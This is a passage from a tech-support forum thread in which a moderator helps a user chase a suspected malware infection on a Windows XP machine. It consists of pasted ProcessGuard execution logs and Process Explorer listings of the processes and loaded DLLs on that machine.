[EXECUTION] Started by "c:\windows\explorer.exe" [1184]
[EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" /start ]
Sat 03 - 16:23:29 [EXECUTION] "c:\windows\system32\nwiz.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1184]
[EXECUTION] Commandline - [ "c:\windows\system32\nwiz.exe" /install ]
Sat 03 - 16:23:29 [EXECUTION] "c:\program files\processguard\pgaccount.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1184]
[EXECUTION] Commandline - [ "c:\program files\processguard\pgaccount.exe" ]
Sat 03 - 16:23:30 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1184]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" nview.dll,nviewloadhook ]
Sat 03 - 16:23:32 [EXECUTION] "c:\program files\processguard\procguard.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1184]
[EXECUTION] Commandline - [ "c:\program files\processguard\procguard.exe" -minimize ]
Sat 03 - 16:23:32 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [212]
[EXECUTION] Commandline - [ rundll32 nview.dll,nviewinitialize ]
Sat 03 - 16:23:33 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [476]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Sat 03 - 16:23:34 [EXECUTION] "c:\program files\microsoft office\office\osa9.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1184]
[EXECUTION] Commandline - [ "c:\program files\microsoft office\office\osa9.exe" -b -l ]
Sat 03 - 16:24:08 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds4803a6f4f77ae748bac303f317d5d6fa ]
Sat 03 - 16:24:08 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds030de7edb5ad754b84433a09651951f0 ]
Sat 03 - 16:24:08 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsd36dbec67b26734d99337236aef0c6c2 ]
Sat 03 - 16:24:08 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds45c55d77c86c164b89f784aafe3bd900 ]
Sat 03 - 16:24:08 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ rundll32.exe shell32.dll,activate_rundll ]
Sat 03 - 16:24:09 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [476]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Sat 03 - 16:24:37 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ rundll32.exe shell32.dll,activate_rundll ]
Sat 03 - 16:24:37 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [476]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Sat 03 - 16:25:53 [EXECUTION] "c:\windows\explorer.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1184]
[EXECUTION] Commandline - [ "c:\windows\explorer.exe" /n,/e,c:\ ]
Sat 03 - 16:25:55 [EXECUTION] "c:\windows\explorer.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1184]
[EXECUTION] Commandline - [ "c:\windows\explorer.exe" /n,/e,c:\ ]
Sat 03 - 16:26:50 [EXECUTION] "g:\autorun.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1184]
[EXECUTION] Commandline - [ g:\autorun.exe "index.html$0$0" /hide ]
Sat 03 - 16:26:50 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ rundll32.exe shell32.dll,activate_rundll ]
Sat 03 - 16:27:05 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 1184 -h 824 "global\0400f64a04f41981a8" ]
Sat 03 - 16:27:06 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ rundll32.exe shell32.dll,activate_rundll ]
Sat 03 - 16:27:14 [EXECUTION] "c:\windows\explorer.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\winlogon.exe" [432]
[EXECUTION] Commandline - [ c:\windows\explorer.exe ]
Sat 03 - 16:28:18 [EXECUTION] "c:\windows\system32\logonui.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\winlogon.exe" [432]
[EXECUTION] Commandline - [ logonui.exe /status /shutdown ]
Sat 03 - 16:28:31 [EXECUTION] "c:\windows\system32\dwwin.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1344]
[EXECUTION] Commandline - [ c:\windows\system32\dwwin.exe -x -s 172 ]
Sat 03 - 16:28:31 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [476]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Sat 03 - 16:28:38 [TERMINATE] c:\windows\system32\services.exe [476] was blocked from terminating c:\windows\system32\spoolsv.exe [900]

---Process Guard Log Started---
Sat 03 - 16:29:43 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]
Sat 03 - 16:29:43 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1320]
[EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]
Sat 03 - 16:29:43 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]
Sat 03 - 16:30:37 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsf57ed4be707c0d43be59fe9ade647c3f ]
Sat 03 - 16:30:37 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds76facb88049ccf4eb227d289e92a28f0 ]
Sat 03 - 16:30:37 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds64dacab271ccfe48bdcd354fe1dad4f3 ]
Sat 03 - 16:30:37 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsaec3a16bad7b2b42bde92899e637c6d7 ]
Sat 03 - 16:30:42 [EXECUTION] "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" ]
Sat 03 - 16:30:42 [EXECUTION] "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" ]
Sat 03 - 16:30:43 [EXECUTION] "c:\windows\system32\nerocheck.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\windows\system32\nerocheck.exe" ]
Sat 03 - 16:30:43 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" c:\windows\system32\nvcpl.dll,nvstartup ]
Sat 03 - 16:30:43 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 0 -k ]
Sat 03 - 16:30:43 [EXECUTION] "c:\program files\quicktime\qttask.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\program files\quicktime\qttask.exe" -atboottime ]
Sat 03 - 16:30:43 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [292]
[EXECUTION] Commandline - [ c:\windows\system32\dumprep.exe 0 -kg ]
Sat 03 - 16:30:43 [EXECUTION] "c:\program files\grisoft\avg free\avgcc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgcc.exe" /startup ]
Sat 03 - 16:30:44 [EXECUTION] "c:\program files\grisoft\avg free\avgemc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgemc.exe" ]
Sat 03 - 16:30:44 [EXECUTION] "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" /start ]
Sat 03 - 16:30:44 [EXECUTION] "c:\windows\system32\nwiz.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\windows\system32\nwiz.exe" /install ]
Sat 03 - 16:30:44 [EXECUTION] "c:\program files\processguard\pgaccount.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\program files\processguard\pgaccount.exe" ]
Sat 03 - 16:30:45 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" nview.dll,nviewloadhook ]
Sat 03 - 16:30:45 [EXECUTION] "c:\program files\processguard\procguard.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\program files\processguard\procguard.exe" -minimize ]
Sat 03 - 16:30:45 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [392]
[EXECUTION] Commandline - [ rundll32 nview.dll,nviewinitialize ]
Sat 03 - 16:30:46 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Sat 03 - 16:30:46 [EXECUTION] "c:\program files\microsoft office\office\osa9.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\program files\microsoft office\office\osa9.exe" -b -l ]
Sat 03 - 16:31:12 [EXECUTION] "c:\windows\explorer.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\windows\explorer.exe" /n,/e,c:\ ]
Sat 03 - 16:32:37 [EXECUTION] "c:\windows\system32\logonui.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\winlogon.exe" [432]
[EXECUTION] Commandline - [ logonui.exe /status /shutdown ]
Sat 03 - 16:32:47 [TERMINATE] c:\windows\system32\services.exe [480] was blocked from terminating c:\windows\system32\spoolsv.exe [1040]

---Process Guard Log Started---
Sat 03 - 17:10:14 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [476]
[EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]
Sat 03 - 17:10:14 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1316]
[EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]
Sat 03 - 17:10:15 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [476]
[EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]
Sat 03 - 17:10:16 [EXECUTION] "c:\program files\grisoft\avg free\avginet.exe" was allowed to run
[EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgamsvr.exe" [1180]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avginet.exe" /sched=5 ]
Sat 03 - 17:10:22 [EXECUTION] "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" ]
Sat 03 - 17:10:22 [EXECUTION] "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" ]
Sat 03 - 17:10:22 [EXECUTION] "c:\windows\system32\nerocheck.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\windows\system32\nerocheck.exe" ]
Sat 03 - 17:10:23 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" c:\windows\system32\nvcpl.dll,nvstartup ]
Sat 03 - 17:10:23 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 0 -k ]
Sat 03 - 17:10:23 [EXECUTION] "c:\program files\quicktime\qttask.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\program files\quicktime\qttask.exe" -atboottime ]
Sat 03 - 17:10:23 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [2020]
[EXECUTION] Commandline - [ c:\windows\system32\dumprep.exe 0 -kg ]
Sat 03 - 17:10:23 [EXECUTION] "c:\program files\grisoft\avg free\avgcc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgcc.exe" /startup ]
Sat 03 - 17:10:24 [EXECUTION] "c:\program files\grisoft\avg free\avgemc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgemc.exe" ]
Sat 03 - 17:10:24 [EXECUTION] "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" /start ]
Sat 03 - 17:10:24 [EXECUTION] "c:\windows\system32\nwiz.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\windows\system32\nwiz.exe" /install ]
Sat 03 - 17:10:24 [EXECUTION] "c:\program files\processguard\pgaccount.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\program files\processguard\pgaccount.exe" ]
Sat 03 - 17:10:24 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" nview.dll,nviewloadhook ]
Sat 03 - 17:10:24 [EXECUTION] "c:\program files\processguard\procguard.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\program files\processguard\procguard.exe" -minimize ]
Sat 03 - 17:10:25 [EXECUTION] "c:\program files\microsoft office\office\osa9.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\program files\microsoft office\office\osa9.exe" -b -l ]
Sat 03 - 17:10:25 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [304]
[EXECUTION] Commandline - [ rundll32 nview.dll,nviewinitialize ]
Sat 03 - 17:10:25 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [476]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Sat 03 - 17:10:35 [EXECUTION] "c:\windows\explorer.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\windows\explorer.exe" /n,/e,c:\ ]
Sat 03 - 17:11:04 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsbc1320c460a9c74bba7fe1007ae2fe91 ]
Sat 03 - 17:11:04 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUT
  • 0

#202
Metallica

Metallica

    Spyware Veteran

  • GeekU Moderator
  • 31,942 posts
I'm not sure if I already asked you to download and install Process Explorer.
If not you can get it here:
http://www.sysintern...ssExplorer.html

In the upper pane select View > Show Processes from all users
and > Show Lower Pane
Then select the process lsass.exe

In the lower pane you should see a list of (mostly) dll files.

Then click File > Save as lsassexe.txt

Find that file and post the content.

Regards,
  • 0

#203
duglartis

duglartis

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 159 posts
have loaded the programme up and have the following txt file for you to look at, been having problems with the cpu going up to 100% usage and locking machine up when on the internet also last night it would appear to be connected but was not in fact connected at all icons were showing in the tool bar
hope this makes sense thanks for your help
Process PID CPU Description Company Name
System Idle Process 0 93.20
Interrupts n/a 0.97 Hardware Interrupts
DPCs n/a Deferred Procedure Calls
System 4
SMSS.EXE 360 Windows NT Session Manager Microsoft Corporation
CSRSS.EXE 408 Client Server Runtime Process Microsoft Corporation
WINLOGON.EXE 440 Windows NT Logon Application Microsoft Corporation
SERVICES.EXE 484 0.97 Services and Controller app Microsoft Corporation
SVCHOST.EXE 652 Generic Host Process for Win32 Services Microsoft Corporation
SVCHOST.EXE 740 Generic Host Process for Win32 Services Microsoft Corporation
SVCHOST.EXE 796 Generic Host Process for Win32 Services Microsoft Corporation
SPOOLSV.EXE 1072 Spooler SubSystem App Microsoft Corporation
ALG.EXE 1204 Application Layer Gateway Service Microsoft Corporation
AVGAMSVR.EXE 1236 AVG Alert Manager GRISOFT, s.r.o.
AVGUPSVC.EXE 1336 AVG Update Service GRISOFT, s.r.o.
DCSUserProt.exe 1412 DiamondCS ProcessGuard Service DiamondCS
ewidoctrl.exe 1488 ewido control ewido networks
NVSVC32.EXE 1580 NVIDIA Driver Helper Service, Version 42.30 NVIDIA Corporation
TCPSVCS.EXE 1688 TCP/IP Services Application Microsoft Corporation
SVCHOST.EXE 1780 Generic Host Process for Win32 Services Microsoft Corporation
SVCHOST.EXE 704 2.91 Generic Host Process for Win32 Services Microsoft Corporation
LSASS.EXE 496 LSA Shell (Export Version) Microsoft Corporation
EXPLORER.EXE 1004 Windows Explorer Microsoft Corporation
HPZTSB07.EXE 1216 HP
Directcd.exe 1244 DirectCD Application Roxio
AVGCC.EXE 1396 AVG Control Center GRISOFT, s.r.o.
AVGEMC.EXE 1420 AVG E-Mail Scanner GRISOFT, s.r.o.
REGPROT.EXE 1480
pgaccount.exe 1588 pgaccount DiamondCS
realsched.exe 1604 RealNetworks Scheduler RealNetworks, Inc.
procguard.exe 1808 GUI Aspect of ProcessGuard DiamondCS
IEXPLORE.EXE 768 Internet Explorer Microsoft Corporation
RUNDLL32.EXE 1856 Run a DLL as an App Microsoft Corporation
procexp.exe 1312 2.91 Sysinternals Process Explorer Sysinternals

Process: LSASS.EXE Pid: 496

Name Description Company Name Version
advapi32.dll Advanced Windows 32 Base API Microsoft Corporation 5.01.2600.1106
comctl32.dll User Experience Controls Library Microsoft Corporation 6.00.2800.1106
comctl32.dll Common Controls Library Microsoft Corporation 5.82.2800.1106
crypt32.dll Crypto API32 Microsoft Corporation 5.131.2600.1106
cryptdll.dll Cryptography Manager Microsoft Corporation 5.01.2600.0000
ctype.nls
dnsapi.dll DNS Client API DLL Microsoft Corporation 5.01.2600.1106
dssenh.dll Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider Microsoft Corporation 5.01.2600.1029
gdi32.dll GDI Client DLL Microsoft Corporation 5.01.2600.1106
iphlpapi.dll IP Helper API Microsoft Corporation 5.01.2600.0002
ipsecsvc.dll Windows IPSec SPD Server DLL Microsoft Corporation 5.01.2600.1106
kerberos.dll Kerberos Security Package Microsoft Corporation 5.01.2600.1106
kernel32.dll Windows NT BASE API Client DLL Microsoft Corporation 5.01.2600.1106
locale.nls
lsasrv.dll LSA Server DLL Microsoft Corporation 5.01.2600.1106
lsass.exe LSA Shell (Export Version) Microsoft Corporation 5.01.2600.1106
mpr.dll Multiple Provider Router DLL Microsoft Corporation 5.01.2600.0000
msasn1.dll ASN.1 Runtime APIs Microsoft Corporation 5.01.2600.0000
msprivs.dll Microsoft Privilege Translations Microsoft Corporation 5.01.2600.0000
msv1_0.dll Microsoft Authentication Package v1.0 Microsoft Corporation 5.01.2600.1106
msvcp60.dll Microsoft ® C++ Runtime Library Microsoft Corporation 6.00.8972.0000
msvcrt.dll Windows NT CRT DLL Microsoft Corporation 7.00.2600.1106
mswsock.dll Microsoft Windows Sockets 2.0 Service Provider Microsoft Corporation 5.01.2600.0000
netapi32.dll Net Win32 API DLL Microsoft Corporation 5.01.2600.1106
netlogon.dll Net Logon Services DLL Microsoft Corporation 5.01.2600.1106
ntdll.dll NT Layer DLL Microsoft Corporation 5.01.2600.1106
ntdsapi.dll NT5DS Microsoft Corporation 5.01.2600.0000
oakley.dll Oakley Key Manager Microsoft Corporation 5.01.2600.1106
ole32.dll Microsoft OLE for Windows Microsoft Corporation 5.01.2600.1106
oleaut32.dll Microsoft OLE 3.50 for Windows NT™ and Windows 95™ Operating Systems Microsoft Corporation 3.50.5016.0000
psbase.dll Protected Storage default provider Microsoft Corporation 5.01.2600.1106
pstorsvc.dll Protected storage server Microsoft Corporation 5.01.2600.0000
rpcrt4.dll Remote Procedure Call Runtime Microsoft Corporation 5.01.2600.1106
rsaenh.dll Microsoft Base Cryptographic Provider Microsoft Corporation 5.01.2600.1029
samlib.dll SAM Library DLL Microsoft Corporation 5.01.2600.1106
samsrv.dll SAM Server DLL Microsoft Corporation 5.01.2600.0000
scecli.dll Windows Security Configuration Editor Client Engine Microsoft Corporation 5.01.2600.1106
schannel.dll TLS / SSL Security Provider Microsoft Corporation 5.01.2600.0000
secur32.dll Security Support Provider Interface Microsoft Corporation 5.01.2600.1106
setupapi.dll Windows Setup API Microsoft Corporation 5.01.2600.1106
shell32.dll Windows Shell Common Dll Microsoft Corporation 6.00.2800.1106
shlwapi.dll Shell Light-weight Utility Library Microsoft Corporation 6.00.2800.1106
sortkey.nls
sorttbls.nls
unicode.nls
user32.dll Windows XP USER API Client DLL Microsoft Corporation 5.01.2600.1106
userenv.dll Userenv Microsoft Corporation 5.01.2600.1106
w32time.dll Windows Time Service Microsoft Corporation 5.01.2600.1106
wdigest.dll Microsoft Digest Access Microsoft Corporation 5.01.2600.0000
winipsec.dll Windows IPSec SPD Client DLL Microsoft Corporation 5.01.2600.0000
wldap32.dll Win32 LDAP API DLL Microsoft Corporation 5.01.2600.1106
ws2_32.dll Windows Socket 2.0 32-Bit DLL Microsoft Corporation 5.01.2600.0000
ws2help.dll Windows Socket 2.0 Helper for Windows NT Microsoft Corporation 5.01.2600.0000
wshtcpip.dll Windows Sockets Helper DLL Microsoft Corporation 5.01.2600.0000
  • 0

#204
Metallica

Metallica

    Spyware Veteran

  • GeekU Moderator
  • 31,942 posts
Nothing in that list that shouldn't be there.

Only your fileversions are SP1 or older when they should be at SP2

I can't shake the feeling that something gets activated as soon as you connect to the internet.
Looking at your PG logs lsass.exe was a logical suspect, since the connection to the malwareserver seems to be triggered by (or immediately after) it.

Can you repeat this procedure for the svchost process with the lowest PID
In your last log (652) usually directly unders services.exe in the list of applications.

Regards,
  • 0

#205
duglartis

duglartis

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 159 posts
hello hope i got this right first two posts of logs is when running normal 3 log is when cpu locks up as it is 100% committed
Process PID CPU Description Company Name
System Idle Process 0 73.53
Interrupts n/a Hardware Interrupts
DPCs n/a 0.98 Deferred Procedure Calls
System 4 4.90
SMSS.EXE 360 Windows NT Session Manager Microsoft Corporation
CSRSS.EXE 412 Client Server Runtime Process Microsoft Corporation
WINLOGON.EXE 436 Windows NT Logon Application Microsoft Corporation
SERVICES.EXE 480 0.98 Services and Controller app Microsoft Corporation
SVCHOST.EXE 652 Generic Host Process for Win32 Services Microsoft Corporation
SVCHOST.EXE 676 Generic Host Process for Win32 Services Microsoft Corporation
SVCHOST.EXE 740 Generic Host Process for Win32 Services Microsoft Corporation
SVCHOST.EXE 800 Generic Host Process for Win32 Services Microsoft Corporation
SPOOLSV.EXE 1068 Spooler SubSystem App Microsoft Corporation
ALG.EXE 1180 Application Layer Gateway Service Microsoft Corporation
AVGAMSVR.EXE 1192 AVG Alert Manager GRISOFT, s.r.o.
AVGW.EXE 1884 17.65 AVG 7.0 GRISOFT, s.r.o.
AVGUPSVC.EXE 1244 AVG Update Service GRISOFT, s.r.o.
DCSUserProt.exe 1284 DiamondCS ProcessGuard Service DiamondCS
ewidoctrl.exe 1316 ewido control ewido networks
NVSVC32.EXE 1412 NVIDIA Driver Helper Service, Version 42.30 NVIDIA Corporation
TCPSVCS.EXE 1500 TCP/IP Services Application Microsoft Corporation
SVCHOST.EXE 1636 Generic Host Process for Win32 Services Microsoft Corporation
LSASS.EXE 492 LSA Shell (Export Version) Microsoft Corporation
EXPLORER.EXE 1008 Windows Explorer Microsoft Corporation
HPZTSB07.EXE 1324 HP
Directcd.exe 1332 DirectCD Application Roxio
AVGCC.EXE 1620 AVG Control Center GRISOFT, s.r.o.
AVGEMC.EXE 1696 AVG E-Mail Scanner GRISOFT, s.r.o.
REGPROT.EXE 1736
pgaccount.exe 1856 pgaccount DiamondCS
procguard.exe 160 GUI Aspect of ProcessGuard DiamondCS
RUNDLL32.EXE 184 Run a DLL as an App Microsoft Corporation
procexp.exe 1352 1.96 Sysinternals Process Explorer Sysinternals

Process: SERVICES.EXE Pid: 480

Name Description Company Name Version
advapi32.dll Advanced Windows 32 Base API Microsoft Corporation 5.01.2600.1106
AppEvent.Evt
apphelp.dll Application Compatibility Client Library Microsoft Corporation 5.01.2600.1106
authz.dll Authorization Framework Microsoft Corporation 5.01.2600.0000
c_850.nls
ctype.nls
eventlog.dll Event Logging Service Microsoft Corporation 5.01.2600.1106
gdi32.dll GDI Client DLL Microsoft Corporation 5.01.2600.1106
kernel32.dll Windows NT BASE API Client DLL Microsoft Corporation 5.01.2600.1106
locale.nls
msvcrt.dll Windows NT CRT DLL Microsoft Corporation 7.00.2600.1106
ncobjapi.dll Microsoft Corporation 5.01.2600.1106
netapi32.dll Net Win32 API DLL Microsoft Corporation 5.01.2600.1106
ntdll.dll NT Layer DLL Microsoft Corporation 5.01.2600.1106
psapi.dll Process Status Helper Microsoft Corporation 5.01.2600.1106
rpcrt4.dll Remote Procedure Call Runtime Microsoft Corporation 5.01.2600.1106
scesrv.dll Windows Security Configuration Editor Engine Microsoft Corporation 5.01.2600.1106
SecEvent.Evt
secur32.dll Security Support Provider Interface Microsoft Corporation 5.01.2600.1106
services.exe Services and Controller app Microsoft Corporation 5.01.2600.0000
sortkey.nls
sorttbls.nls
SysEvent.Evt
umpnpmgr.dll User-mode Plug-and-Play Service Microsoft Corporation 5.01.2600.1106
unicode.nls
